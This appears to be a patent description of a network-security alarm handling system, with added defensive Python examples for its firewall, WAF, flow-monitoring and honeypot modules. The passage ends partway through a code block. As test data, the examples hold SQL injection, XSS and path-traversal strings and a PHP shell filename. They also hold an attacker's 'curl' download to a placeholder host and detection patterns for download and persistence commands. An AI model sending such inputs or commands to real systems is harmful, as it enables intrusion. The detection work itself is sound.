Specifically, the API monitoring module 1 includes an interface availability monitoring unit 101, a performance monitoring unit 102, a security monitoring unit 103, an error monitoring unit 104, a business logic monitoring unit 105 and a first log recording unit 106, wherein
the interface availability monitoring unit 101 is configured to periodically check the availability of the API interfaces by sending requests to the API endpoints and verifying the returned status code, response time and other indicators, so as to ensure that the API operates normally;
the performance monitoring unit 102 is configured to measure performance indicators of the API such as response time, throughput and latency, and to simulate and send requests under different loads so as to evaluate performance bottlenecks and optimization needs of the API;
the security monitoring unit 103 monitors malicious behaviour, abnormal requests and potential security vulnerabilities and provides real-time alarms and logging;
the error monitoring unit 104 is configured to monitor error codes and error messages returned by the API and to check error messages in API responses so as to discover and handle error conditions in time;
the business logic monitoring unit 105 is configured to verify whether the business logic of the API is correct, executing predefined test cases to check whether the behaviour and results of the API under various input conditions meet expectations;
the first log recording unit 106 is configured to collect, record and analyze the monitored API data, generate reports and visual charts, and display the usage, performance indicators and fault conditions of the API.
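As an added example serving the API monitoring module as described here and in the summary above, not code from the patent: a Python monitor with an injected transport that checks availability (5xx or connection failure), error responses (4xx), a latency budget (performance) and a predefined business-logic test case, and emits one alarm per failed check. The endpoints, responses and latency budget are constructed for the example; in a deployment the transport would wrap an HTTP client.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

# A probe returns (HTTP status, latency in ms, decoded JSON body). The transport is injected
# so the example runs offline; a deployment would wrap requests.get or httpx.get here.
Transport = Callable[[str], Tuple[int, float, dict]]


@dataclass
class Alarm:
    endpoint: str
    kind: str      # availability | performance | error | business_logic
    detail: str


@dataclass
class ApiMonitor:
    transport: Transport
    latency_budget_ms: float = 500.0
    # Predefined business-logic test cases: endpoint -> predicate over the response body.
    test_cases: Dict[str, Callable[[dict], bool]] = field(default_factory=dict)

    def probe(self, endpoint: str) -> List[Alarm]:
        alarms: List[Alarm] = []
        try:
            status, latency_ms, body = self.transport(endpoint)
        except Exception as exc:   # connection failure: the interface is unavailable
            return [Alarm(endpoint, "availability", f"request failed: {exc}")]
        if status >= 500:
            alarms.append(Alarm(endpoint, "availability", f"status {status}"))
        elif status >= 400:       # error monitoring: the API answered, but with an error
            alarms.append(Alarm(endpoint, "error", f"status {status}: {body.get('error', '')}"))
        if latency_ms > self.latency_budget_ms:
            alarms.append(Alarm(endpoint, "performance",
                                f"{latency_ms:.0f} ms exceeds {self.latency_budget_ms:.0f} ms budget"))
        check = self.test_cases.get(endpoint)
        if check is not None and status < 400 and not check(body):
            alarms.append(Alarm(endpoint, "business_logic", "response violates the expected invariant"))
        return alarms

    def run(self, endpoints: List[str]) -> Dict[str, List[Alarm]]:
        return {ep: self.probe(ep) for ep in endpoints}


# Constructed responses for hypothetical endpoints; no real service is contacted.
FAKE_RESPONSES: Dict[str, Tuple[int, float, dict]] = {
    "/api/v1/health": (200,  42.0, {"status": "ok"}),
    "/api/v1/orders": (200, 910.0, {"items": [], "total": 3}),   # slow, and total disagrees with items
    "/api/v1/login":  (401,  35.0, {"error": "invalid credentials"}),
    "/api/v1/export": (503, 120.0, {}),
}


def fake_transport(endpoint: str) -> Tuple[int, float, dict]:
    if endpoint not in FAKE_RESPONSES:
        raise ConnectionError("no route to host")
    return FAKE_RESPONSES[endpoint]


def build_monitor() -> ApiMonitor:
    return ApiMonitor(
        transport=fake_transport,
        latency_budget_ms=500.0,
        test_cases={"/api/v1/orders": lambda body: body["total"] == len(body["items"])},
    )


ENDPOINTS = list(FAKE_RESPONSES) + ["/api/v1/missing"]

if __name__ == "__main__":
    for endpoint, alarms in build_monitor().run(ENDPOINTS).items():
        print(endpoint, [(a.kind, a.detail) for a in alarms] or "ok")
```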
Specifically, the DDOS-resistant module 2 includes a first traffic analysis unit 201, a traffic cleaning unit 202, a load balancing unit 203, a first security authentication unit 204, a defense protocol unit 205 and a second logging unit 206,
the first flow analysis unit 201 is configured to be responsible for monitoring and analyzing the flow entering the system in real time, and identifying and recording various types of flows, such as normal flow, abnormal flow, attack flow, and the like;
the traffic washing unit 202 is configured to be responsible for filtering and washing traffic entering the system, filtering malicious traffic and attack traffic from the traffic, and filtering malicious traffic and attack traffic from the traffic by using various technologies, such as a blacklist, a whitelist, a rule engine, etc.;
the load balancing unit 203 is configured to be responsible for balancing and distributing traffic among a plurality of servers, and dynamically adjusts according to the performance and load conditions of the servers so as to realize fairness of traffic distribution;
the first security authentication unit 204 is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack, and may use various techniques such as two-factor authentication, IP restriction, verification codes, etc., to authenticate the user prior to access;
the defense protocol unit 205 is configured to identify and block the various DDOS attack types, such as TCP SYN flood, UDP flood and HTTP flood, and to detect and defend against the corresponding attack traffic;
the second logging unit 206 is configured to collect, record and analyze DDOS-resistant data, and generate reports and visual charts showing DDOS-resistant capability, attack situation and processing effect of the system.
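The three traffic-handling units of the anti-DDOS module (classification in unit 201, cleaning with list precedence in unit 202, distribution in unit 203) are easiest to understand as one small pipeline. The following is an added example written for this page, not code from the patent; the flow records, the allowlist/blocklist contents, the thresholds and the server names are all constructed, and the per-source sliding-window rate with a SYN-only ratio is one plausible way to separate normal, abnormal and attack traffic, not the patent's stated method.

```python
"""Added example (not from the patent): the anti-DDOS module's traffic
classification (unit 201), cleaning (unit 202) and load balancing (unit 203)
as one small pipeline. Sample flows, address lists and thresholds are
constructed for illustration; a real deployment takes them from the traffic
sensor and the operator's policy."""
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class Flow:
    ts: float          # arrival time in seconds
    src_ip: str
    dst_port: int
    syn_only: bool     # TCP SYN that never completed the handshake


@dataclass
class CleaningPolicy:
    allowlist: set = field(default_factory=set)   # always passed
    blocklist: set = field(default_factory=set)   # always dropped
    window_s: float = 10.0          # sliding window per source
    abnormal_count: int = 50        # packets per window before "abnormal"
    attack_count: int = 200         # packets per window before "attack"
    syn_ratio_attack: float = 0.9   # abnormal + mostly SYN-only => SYN flood


class TrafficCleaner:
    def __init__(self, policy):
        self.policy = policy
        self.windows = defaultdict(deque)   # src_ip -> deque of (ts, syn_only)

    def classify(self, flow):
        """Unit 201: label the flow normal / abnormal / attack from its source's recent rate."""
        p = self.policy
        q = self.windows[flow.src_ip]
        q.append((flow.ts, flow.syn_only))
        while q and flow.ts - q[0][0] > p.window_s:   # evict packets outside the window
            q.popleft()
        count = len(q)
        syn_ratio = sum(1 for _, s in q if s) / count
        if count >= p.attack_count or (count >= p.abnormal_count and syn_ratio >= p.syn_ratio_attack):
            return "attack"
        if count >= p.abnormal_count:
            return "abnormal"
        return "normal"

    def decide(self, flow):
        """Unit 202: allowlist first, then blocklist, then the classifier's verdict."""
        if flow.src_ip in self.policy.allowlist:
            return "pass"
        if flow.src_ip in self.policy.blocklist:
            return "drop"
        return {"normal": "pass", "abnormal": "rate_limit", "attack": "drop"}[self.classify(flow)]


class LeastLoadBalancer:
    """Unit 203: hand each passed flow to the server with the fewest active connections."""
    def __init__(self, servers):
        self.load = {s: 0 for s in servers}

    def pick(self):
        server = min(self.load, key=lambda s: (self.load[s], s))   # ties broken by name
        self.load[server] += 1
        return server


def run_demo():
    """Constructed scenario: one SYN-flooding source, one chatty but legitimate client,
    one blocklisted and one allowlisted source. Returns per-source decisions and server loads."""
    policy = CleaningPolicy(allowlist={"10.0.0.5"}, blocklist={"203.0.113.9"},
                            abnormal_count=5, attack_count=20)
    cleaner = TrafficCleaner(policy)
    balancer = LeastLoadBalancer(["web-1", "web-2"])
    flows = [Flow(i * 0.03, "198.51.100.7", 443, True) for i in range(30)]       # SYN flood
    flows += [Flow(1.0 + i * 0.1, "192.0.2.10", 443, False) for i in range(6)]  # busy client
    flows += [Flow(1.1, "203.0.113.9", 443, False), Flow(1.2, "10.0.0.5", 443, False)]
    decisions = defaultdict(list)
    for f in flows:
        verdict = cleaner.decide(f)
        decisions[f.src_ip].append(verdict)
        if verdict == "pass":
            balancer.pick()
    return dict(decisions), balancer.load


if __name__ == "__main__":
    for src, verdicts in run_demo()[0].items():
        print(src, {v: verdicts.count(v) for v in set(verdicts)})
```

The point worth noticing is the ordering in `decide`: the allowlist is consulted before any rate logic, so an allowlisted address can never be rate-limited, which is convenient for monitoring probes but means the allowlist itself must be kept small and reviewed. The busy legitimate client crosses the abnormal threshold but, because its packets complete handshakes, is only rate-limited rather than dropped.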
Specifically, the firewall module 3 includes a packet filtering unit 301, an application layer proxy unit 302, a state tracking unit 303, a VPN unit 304, an IDS/IPS unit 305 and a third logging unit 306,
the packet filtering unit 301 is configured to be responsible for checking network packets and filtering and blocking packets not conforming to rules according to a predefined rule set, and may filter according to information such as source IP address, destination IP address, port number, etc.;
the application layer proxy unit 302 is configured to check and filter data above the transport layer; it parses application layer protocols, such as HTTP, FTP and SMTP, and checks and filters the transmitted data;
the state tracking unit 303 is configured to be responsible for tracking the state of network connection, and perform filtering and authentication according to the state, so as to detect and prevent unauthorized connection, malicious activity and abnormal behavior;
the VPN unit 304 is configured to be responsible for establishing and managing a secure remote connection, and encrypts and tunnels data using encryption technology to secure communications of users over a public network;
the IDS/IPS unit 305 is configured to be responsible for detecting and defending intrusion activity, monitoring network traffic and system logs, identifying abnormal behavior and malicious attacks, and triggering alarms or taking automatic defensive measures;
the third logging unit 306 is configured to collect, record and analyze firewall data, and generate logs and reports showing network traffic, security events, audit information, etc., to assist administrators in security analysis and decision making.
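Units 301 and 303 together describe a classic stateful packet filter: a first-match rule set keyed on source, destination and port, plus a connection table so that reply traffic of an admitted connection does not have to be re-matched. The following is an added example for this page (not the patent's code); the rule set, the 10.0.0.0/8 server segment, the TEST-NET addresses and the packets are constructed.

```python
"""Added example (not from the patent): a rule-based, stateful packet filter
combining units 301 (filtering by source, destination and port) and 303
(connection-state tracking). Rules, addresses and packets are constructed."""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str          # "tcp", "udp" or "icmp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False   # TCP SYN without ACK: a new connection attempt


@dataclass
class Rule:
    action: str                  # "allow" or "deny"
    proto: str = "any"
    src: str = "0.0.0.0/0"       # CIDR
    dst: str = "0.0.0.0/0"       # CIDR
    dport: Optional[int] = None  # None matches any destination port

    def matches(self, pkt):
        return (self.proto in ("any", pkt.proto)
                and ipaddress.ip_address(pkt.src) in ipaddress.ip_network(self.src)
                and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(self.dst)
                and (self.dport is None or self.dport == pkt.dport))


class StatefulFirewall:
    """First matching rule wins; reply packets of an allowed connection pass on state alone."""

    def __init__(self, rules, default="deny"):
        self.rules = rules
        self.default = default
        self.established = set()     # 5-tuples of connections an allow rule admitted

    @staticmethod
    def _key(pkt):
        return (pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport)

    @staticmethod
    def _reverse(pkt):
        return (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)

    def filter(self, pkt):
        """Return (verdict, reason). A SYN is always a new connection and must pass the rules."""
        if not pkt.syn and (self._key(pkt) in self.established or self._reverse(pkt) in self.established):
            return "allow", "established"
        for i, rule in enumerate(self.rules):
            if rule.matches(pkt):
                if rule.action == "allow":
                    self.established.add(self._key(pkt))
                return rule.action, f"rule[{i}]"
        return self.default, "default"


def run_demo():
    """Constructed policy for a 10.0.0.0/8 server segment: one blocked source network, HTTPS to
    any internal host and DNS to the resolver allowed, everything else (including unsolicited
    connections originating from the servers) denied. Returns the verdict of each test packet."""
    fw = StatefulFirewall([
        Rule("deny", proto="tcp", src="198.51.100.0/24"),   # must precede the allow rules
        Rule("allow", proto="tcp", dst="10.0.0.0/8", dport=443),
        Rule("allow", proto="udp", dst="10.0.0.53/32", dport=53),
    ])
    packets = {
        "client_syn":   Packet("tcp", "192.0.2.10", 50000, "10.0.1.20", 443, syn=True),
        "server_reply": Packet("tcp", "10.0.1.20", 443, "192.0.2.10", 50000),
        "client_data":  Packet("tcp", "192.0.2.10", 50000, "10.0.1.20", 443),
        "unsolicited":  Packet("tcp", "10.0.1.20", 443, "192.0.2.11", 50001),
        "ssh_attempt":  Packet("tcp", "192.0.2.10", 50002, "10.0.1.20", 22, syn=True),
        "blocked_net":  Packet("tcp", "198.51.100.7", 4000, "10.0.1.20", 443, syn=True),
        "dns_query":    Packet("udp", "192.0.2.10", 5353, "10.0.0.53", 53),
    }
    return {name: fw.filter(pkt) for name, pkt in packets.items()}
```

Two details matter in practice: the deny rule for the blocked network has to come before the broad HTTPS allow, because the first match decides, and the connection table is only consulted for non-SYN packets, so a host cannot reuse a stale 5-tuple to open a new connection past the rules. A production filter would also expire table entries; that is omitted here.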
Specifically, the WAF module 4 includes a second traffic analysis unit 401, a rule engine unit 402, a whitelist/blacklist unit 403, a second security authentication unit 404, a file upload/download unit 405, an abnormal behavior detection unit 406, an API protection unit 407, and a fourth logging unit 408,
the second traffic analysis unit 401 is configured to monitor and analyze the traffic of the Web application in real time, record the various request types, such as GET requests, POST requests and file uploads, and analyze the parameters, header information, payload and other characteristics of each request;
the rule engine unit 402 is configured to be responsible for checking request and response data according to a predefined rule set, which may identify and filter common Web attacks such as malicious requests, SQL injection, cross-site scripting attacks, file inclusion attacks, etc.;
the whitelist/blacklist unit 403 is configured to be responsible for managing the list that allows or prohibits access to Web applications by specific IP addresses, users, URLs or HTTP methods, and it may be automatically updated according to predefined policies to ensure that the applications are always protected;
the second security authentication unit 404 is configured to be responsible for authenticating and authorizing the user to prevent unauthorized access and attack, and it may use various technologies such as two-factor authentication, IP restriction, verification code, etc., to authenticate the user before access;
the file uploading/downloading unit 405 is configured to be responsible for checking and controlling the security of file uploading and downloading, detecting the type and size of the uploaded file, and preventing the uploading and downloading of malicious files;
the abnormal behavior detection unit 406 is configured to detect and prevent malicious behaviors of an attacker;
the API protection unit 407 is configured to be responsible for protecting the API from malicious behaviour and attacks;
the fourth logging unit 408 is configured to be responsible for collecting, recording and analyzing WAF data, and it generates logs and reports, presents security events, attack details, audit information, etc. of the Web application, and helps the administrator make security analyses and decisions.
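The rule engine (402), the whitelist/blacklist (403) and the upload control (405) units of the WAF module form one inspection pass over each request. The following added example, written for this page rather than taken from the patent, shows that pass over constructed requests: the signature library is deliberately tiny (three well-known pattern classes), the address lists, file-type policy, size limit and request contents are all constructed, and the field names `upload_name` and `upload_size` are assumptions of the example.

```python
"""Added example (not from the patent): a request-inspection pass in the spirit of
the WAF module's rule engine (402), whitelist/blacklist (403) and upload control
(405) units. Signatures, lists and requests are constructed for illustration and
are deliberately narrow; production rule sets are far larger."""
import re
from dataclasses import dataclass, field
from typing import Optional

# (name, pattern) signature library applied to every inspected text field
SIGNATURES = [
    ("sqli", re.compile(r"(?i)(union\s+select|'\s*or\s+'?\d+'?\s*=\s*'?\d+|;\s*drop\s+table)")),
    ("xss", re.compile(r"(?i)(<script\b|javascript:|\bon\w+\s*=)")),
    ("file_inclusion", re.compile(r"(?i)(\.\./){2,}|php://|file://")),
]


@dataclass
class HttpRequest:
    client_ip: str
    method: str
    path: str
    params: dict = field(default_factory=dict)      # query or form fields
    headers: dict = field(default_factory=dict)
    upload_name: Optional[str] = None               # file name of a multipart upload, if any
    upload_size: int = 0


class WafInspector:
    def __init__(self, allowlist=(), blocklist=(), allowed_ext=(".png", ".jpg", ".pdf"),
                 max_upload=5 * 1024 * 1024):
        self.allowlist, self.blocklist = set(allowlist), set(blocklist)
        self.allowed_ext, self.max_upload = allowed_ext, max_upload

    @staticmethod
    def _fields(req):
        """Every text field the rule engine inspects: path, parameters and selected headers."""
        yield "path", req.path
        for k, v in req.params.items():
            yield f"params.{k}", str(v)
        for k in ("User-Agent", "Referer", "Cookie"):
            if k in req.headers:
                yield f"headers.{k}", req.headers[k]

    def inspect(self, req):
        """Return (verdict, findings). Allowlist beats blocklist beats signatures."""
        if req.client_ip in self.allowlist:
            return "allow", []
        if req.client_ip in self.blocklist:
            return "block", ["blocklist"]
        findings = [f"{name}@{where}" for where, value in self._fields(req)
                    for name, rx in SIGNATURES if rx.search(value)]
        if req.upload_name is not None:                      # unit 405: type and size control
            if not req.upload_name.lower().endswith(self.allowed_ext):
                findings.append("upload_type")
            if req.upload_size > self.max_upload:
                findings.append("upload_size")
        return ("block" if findings else "allow"), findings


def run_demo():
    """Constructed requests covering a clean search, the three signature classes, an
    upload within and outside policy, and the two list short-cuts."""
    waf = WafInspector(allowlist={"10.0.0.5"}, blocklist={"203.0.113.9"}, max_upload=1024)
    requests = {
        "search": HttpRequest("192.0.2.10", "GET", "/search", {"q": "running shoes"}),
        "login_sqli": HttpRequest("192.0.2.10", "POST", "/login", {"user": "admin' OR '1'='1", "pw": "x"}),
        "comment_xss": HttpRequest("192.0.2.11", "POST", "/comment", {"body": "<script>alert(1)</script>"}),
        "traversal": HttpRequest("192.0.2.12", "GET", "/download", {"file": "../../../../etc/passwd"}),
        "ua_xss": HttpRequest("192.0.2.13", "GET", "/", headers={"User-Agent": "Mozilla javascript:void(0)"}),
        "upload_ok": HttpRequest("192.0.2.14", "POST", "/upload", upload_name="photo.jpg", upload_size=512),
        "upload_bad": HttpRequest("192.0.2.15", "POST", "/upload", upload_name="shell.php", upload_size=4096),
        "blocked_ip": HttpRequest("203.0.113.9", "GET", "/", {"q": "hello"}),
        "trusted_ip": HttpRequest("10.0.0.5", "GET", "/admin", {"q": "' or 1=1"}),
    }
    return {name: waf.inspect(r) for name, r in requests.items()}
```

The `trusted_ip` case is the caveat: with allowlist-first precedence a request from a trusted address is not inspected at all, so an allowlist entry is effectively a rule-engine bypass and should be limited to addresses that genuinely need it (monitoring, internal scanners). Findings are reported per field (`sqli@params.user`), which is what the fourth logging unit needs in order to produce useful attack details.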
Specifically, the flow monitoring module 5 includes a data acquisition unit 501, a third flow analysis unit 502, a flow statistics unit 503, an alarm and alert unit 504, a flow reconstruction unit 505, a protocol identification unit 506, a network topology map unit 507 and a fifth logging unit 508,
the data acquisition unit 501 is configured to be responsible for acquiring data packets from a network and converting them into an analyzable format, and may use various techniques such as network sniffing, port mirroring, SPAN, etc. to collect the data packets;
the third flow analysis unit 502 is configured to monitor and analyze the data packets in real time, record the various traffic types, such as TCP, UDP and ICMP, and analyze the source IP address, destination IP address, port number, protocol and other information in each packet;
the traffic statistics unit 503 is configured to count and analyze network traffic; it can classify and aggregate traffic by time, direction, protocol and other dimensions, and generate visualizations such as charts and reports;
the alarm and alert unit 504, configured to be responsible for detecting and triggering alarms and alerts, may check abnormal behavior in traffic, such as DDoS attacks, malware propagation, etc., according to a predefined set of rules, and trigger alarms and alerts;
the traffic reconstruction unit 505 is configured to reconstruct and optimize normal network traffic to reduce the attack effect of an attacker;
the protocol identification unit 506 is configured to perform protocol identification on traffic in network communication;
the network topology map unit 507 is configured to map and manage physical and logical topologies of a network;
the fifth logging unit 508 is configured for collecting, recording and analyzing data of traffic monitoring.
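Units 503, 504 and 506 of the flow monitoring module describe a small analytics loop: identify the protocol of each flow, aggregate bytes by time bucket, direction and protocol, and raise alarms from rules over those aggregates. The following added example (written for this page, not the patent's code) runs that loop over a constructed CSV of flow records; the internal address range, the port-to-application table, the bucket size and the two alarm thresholds are assumptions of the example.

```python
"""Added example (not from the patent): protocol identification (unit 506),
traffic statistics by time bucket, direction and application (unit 503) and two
rule-based alarms (unit 504) run over constructed flow records. The CSV sample,
the internal address range and the thresholds are all constructed."""
import csv
import io
import ipaddress
from collections import Counter, defaultdict

# constructed flow records (one line per flow, as a collector might export them)
SAMPLE_FLOWS = """\
ts,src,dst,proto,dport,bytes
1700000040,10.1.1.5,93.184.216.34,tcp,443,1200
1700000041,10.1.1.5,10.0.0.53,udp,53,80
1700000050,198.51.100.7,10.1.1.20,tcp,21,60
1700000051,198.51.100.7,10.1.1.20,tcp,22,60
1700000052,198.51.100.7,10.1.1.20,tcp,23,60
1700000053,198.51.100.7,10.1.1.20,tcp,25,60
1700000054,198.51.100.7,10.1.1.20,tcp,80,60
1700000060,10.1.1.9,203.0.113.50,tcp,443,5000
1700000070,10.1.1.9,203.0.113.50,tcp,443,5000
1700000080,10.1.1.9,203.0.113.50,tcp,443,5000
1700000090,203.0.113.77,10.1.1.5,icmp,0,84
"""

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed: the monitored site's address space
APP_BY_PORT = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 80: "http", 443: "https"}


def parse_flows(text):
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["ts"], r["dport"], r["bytes"] = int(r["ts"]), int(r["dport"]), int(r["bytes"])
    return rows


def direction(flow):
    s = ipaddress.ip_address(flow["src"]) in INTERNAL
    d = ipaddress.ip_address(flow["dst"]) in INTERNAL
    return {(True, False): "outbound", (False, True): "inbound", (True, True): "internal"}.get((s, d), "transit")


def identify_app(flow):
    """Unit 506, simplified: port-based identification for tcp/udp, protocol name otherwise."""
    if flow["proto"] in ("tcp", "udp"):
        return APP_BY_PORT.get(flow["dport"], f'{flow["proto"]}/{flow["dport"]}')
    return flow["proto"]


def aggregate(flows, bucket_s=60):
    """Unit 503: bytes per (time bucket, direction, application)."""
    stats = Counter()
    for f in flows:
        stats[(f["ts"] // bucket_s * bucket_s, direction(f), identify_app(f))] += f["bytes"]
    return stats


def detect_alarms(flows, bucket_s=60, scan_ports=5, outbound_bytes=10_000):
    """Unit 504: port-scan (one source, many ports on one host) and large-outbound alarms per bucket."""
    ports = defaultdict(set)       # (bucket, src, dst) -> distinct destination ports
    out_bytes = Counter()          # (bucket, src) -> outbound bytes
    for f in flows:
        b = f["ts"] // bucket_s * bucket_s
        if f["proto"] in ("tcp", "udp"):
            ports[(b, f["src"], f["dst"])].add(f["dport"])
        if direction(f) == "outbound":
            out_bytes[(b, f["src"])] += f["bytes"]
    alarms = [("port_scan", src, dst, len(p)) for (b, src, dst), p in ports.items() if len(p) >= scan_ports]
    alarms += [("large_outbound", src, n) for (b, src), n in out_bytes.items() if n >= outbound_bytes]
    return alarms


def run_demo():
    flows = parse_flows(SAMPLE_FLOWS)
    return aggregate(flows), detect_alarms(flows)
```

Port-based application identification is the weak point of this sketch: traffic on port 443 is labelled `https` whether or not it is TLS, so a real unit 506 would confirm the protocol from the payload. The time bucket is part of every aggregate key, which is what lets the same counters feed both the charts of unit 503 and the per-interval thresholds of unit 504.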
Specifically, the honeypot module 6 includes a virtual machine environment unit 601, a service simulation unit 602, a threat intelligence unit 603, a data analysis and alarm unit 604, an attack recovery and analysis unit 605, an adaptive honeypot unit 606 and a crossover honeypot unit 607,
the virtual machine environment unit 601 is configured to create the virtual machine environment and deploy the honeypots in it;
the service simulation unit 602 is configured to be responsible for simulating various network services, such as a Web server, an FTP server, an SMTP server, etc., which will deploy counterfeit services in the honeypot to attract an attacker to attack;
the threat intelligence unit 603 is configured to be responsible for acquiring and analyzing threat intelligence, such as hacker IP addresses, exploit tools, etc., which updates an attack signature library in the honeypot to identify and prevent attacks;
the data analysis and alarm unit 604 is configured to monitor and analyze the data in the honeypot in real time, detect attacks and trigger alarms; when an attacker tries to access the honeypot, the unit records and reports the attack behavior;
the attack recovery and analysis unit 605 is configured to reconstruct the attack process and analyze the attack means; it records information such as the data traffic and command execution during the attack and generates an analysis report that helps the administrator understand the attacker's means and techniques;
the adaptive honeypot unit 606 is configured to trap an attacker in the honeypot system and to monitor and analyze the attack behavior so that threats are discovered and dealt with in time; its main function is to simulate the vulnerabilities and configuration problems of a real system or application, draw the attacker into the honeypot system, and then acquire and analyze information about the attack behavior;
the crossover honeypot unit 607 is configured to trap and monitor the activity of an attacker.
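Units 603, 604 and 605 are the analysis side of the honeypot: match activity against a threat-intelligence and signature library, alarm as events arrive, and reconstruct each attacker's session for the report. The following added example, written for this page and not taken from the patent, does that over constructed honeypot events; the event schema, the intelligence address list, the command signature categories and the brute-force threshold are all assumptions of the example, and the simulated services themselves (unit 602) are not implemented.

```python
"""Added example (not from the patent): honeypot event analysis in the spirit of
units 603 (threat-intelligence signature library), 604 (monitoring and alarms)
and 605 (attack process reconstruction). The events, intelligence list and
signatures are constructed; a real honeypot produces the events from its
simulated services."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class HoneypotEvent:
    ts: int
    src_ip: str
    service: str    # "ssh", "ftp", "http", ...
    kind: str       # "login_failed", "login_success", "command", "upload"
    detail: str     # username, command line or file name


# constructed signature library, the kind of thing unit 603 keeps updated from threat intelligence
COMMAND_SIGNATURES = [
    ("recon", re.compile(r"\b(uname|whoami|id|ifconfig)\b|/etc/passwd")),
    ("download", re.compile(r"\b(wget|curl)\b")),
    ("persistence", re.compile(r"crontab|authorized_keys")),
]


class HoneypotAnalyzer:
    def __init__(self, intel_ips, brute_threshold=5):
        self.intel_ips = set(intel_ips)        # known-bad sources from threat intelligence
        self.brute_threshold = brute_threshold
        self.events = defaultdict(list)        # src_ip -> events in arrival order
        self.alerts = []

    def ingest(self, ev):
        """Unit 604: store the event and raise alerts as it arrives."""
        seen = self.events[ev.src_ip]
        seen.append(ev)
        if len(seen) == 1 and ev.src_ip in self.intel_ips:
            self.alerts.append(("intel_hit", ev.src_ip, ev.ts))
        failed = sum(1 for e in seen if e.kind == "login_failed")
        if ev.kind == "login_failed" and failed == self.brute_threshold:   # fire once per source
            self.alerts.append(("brute_force", ev.src_ip, ev.ts))
        if ev.kind == "command":
            for name, rx in COMMAND_SIGNATURES:
                if rx.search(ev.detail):
                    self.alerts.append((name, ev.src_ip, ev.ts))

    def reconstruct(self, src_ip):
        """Unit 605: the attacker's timeline as (ts, service, kind, detail) tuples."""
        return [(e.ts, e.service, e.kind, e.detail)
                for e in sorted(self.events[src_ip], key=lambda e: e.ts)]

    def report(self):
        """Per-source summary for the administrator's report."""
        out = {}
        for src, evs in self.events.items():
            out[src] = {
                "first_seen": min(e.ts for e in evs),
                "last_seen": max(e.ts for e in evs),
                "services": sorted({e.service for e in evs}),
                "events": len(evs),
                "compromised_session": any(e.kind == "login_success" for e in evs),
                "alerts": [a[0] for a in self.alerts if a[1] == src],
            }
        return out


def run_demo():
    """Constructed scenario: one source brute-forces the fake SSH service, gets in and runs a
    few commands; a second source on the intelligence list touches the fake FTP service once."""
    hp = HoneypotAnalyzer(intel_ips={"192.0.2.33"}, brute_threshold=5)
    events = [HoneypotEvent(100 + i, "198.51.100.7", "ssh", "login_failed", "root") for i in range(6)]
    events += [
        HoneypotEvent(107, "198.51.100.7", "ssh", "login_success", "admin"),
        HoneypotEvent(108, "198.51.100.7", "ssh", "command", "uname -a"),
        HoneypotEvent(109, "198.51.100.7", "ssh", "command", "curl http://203.0.113.5/update.sh"),
        HoneypotEvent(110, "198.51.100.7", "ssh", "command", "ls -la"),
        HoneypotEvent(120, "192.0.2.33", "ftp", "login_failed", "anonymous"),
    ]
    for ev in events:
        hp.ingest(ev)
    return hp.alerts, hp.reconstruct("198.51.100.7"), hp.report()
```

Alerts are emitted at ingest time, so the brute-force alarm fires on the fifth failure rather than after the session ends, while the timeline and report are built on demand for the analysis stage. Anything that reaches a honeypot is suspect by definition, so the signature library here serves classification and prioritisation rather than the allow-or-block decision a WAF rule engine makes.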
The second aspect of the invention discloses a whole-flow handling method based on network security alarm events, which is applied to the handling system described above and comprises the following steps:
s1, polling the security monitoring equipment, including the WAF, the DDOS-resistant equipment, the firewall and the flow monitoring equipment, in turn and acquiring the security alarm information;
s2, screening out the high-risk attack alarm information from the security alarm information, performing a secondary verification and analysis of that high-risk information, and judging whether it is true;
s3, when the high-risk attack alarm information is true, cyclically fetching the attack sources whose state is "to be blocked", executing the blocking operation on the boundary firewall and the DDOS-resistant equipment through the simulator, and blocking the attacking IP;
s4, generating and archiving a problem work order according to the security alarm information.
The screening of high-risk attack alarm information from the security alarm information proceeds as follows. Network security alarms are registered in the system automatically: the alarm detail pages of the security equipment (WAF, honeypot, firewall and so on) are refreshed every 5 minutes; the alarm details, attack source IP, attack target IP, attack time, attack mode and other information on those pages are captured and stored in preset parameters; and the new alarm event with its parameter values is filled into the whole-flow alarm event handling system automatically by the system's simulator operation.
The foregoing describes only illustrative embodiments of the present invention, but the scope of the invention is not limited to them: any variation or substitution that a person skilled in the art can readily conceive within the technical scope of the invention is to be covered by it. The scope of the invention is determined by the appended claims.
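Steps s1 to s4 and the registration paragraph above describe one orchestration loop: poll the devices, screen and verify, block the confirmed sources on the boundary devices, and archive a work order for every alarm. The following added example (written for this page; it is not the patent's implementation) shows that loop end to end with stubs in place of the real parts: the device adapters return constructed alarms instead of scraping alarm pages, the blocking back-ends only record the addresses they were asked to block, and the high-risk type list, the asset inventory, the internal address prefix and the verification rule are assumptions of the example.

```python
"""Added example (not from the patent): the s1-s4 alarm handling flow as an
orchestration skeleton. The device adapters, asset inventory, alarm records and
the blocking back-ends are constructed stubs; the patent's simulator that scrapes
the device alarm pages every 5 minutes and drives the firewall and anti-DDOS
consoles is not reproduced."""
import itertools
from dataclasses import dataclass

# assumed mapping of attack modes to the high-risk class screened in s2
HIGH_RISK_TYPES = {"sql_injection", "webshell_upload", "command_execution", "ddos"}


@dataclass
class Alarm:
    device: str
    attack_type: str
    src_ip: str
    dst_ip: str
    ts: int
    detail: str
    state: str = "new"    # new -> high_risk/low_risk -> to_block/false_positive -> blocked


class DeviceAdapter:
    """Stub for one security device's alarm page; returns its constructed alarms on poll()."""
    def __init__(self, name, alarms):
        self.name, self._alarms = name, list(alarms)

    def poll(self):
        batch, self._alarms = self._alarms, []
        return batch


class BlockingBackend:
    """Stub for a boundary firewall or anti-DDOS device; records the addresses it was asked to block."""
    def __init__(self, name):
        self.name, self.blocked = name, []

    def block(self, ip):
        if ip not in self.blocked:
            self.blocked.append(ip)


def poll_devices(adapters):
    """s1: poll the WAF, anti-DDOS, firewall and traffic-monitoring devices in turn."""
    return [a for adapter in adapters for a in adapter.poll()]


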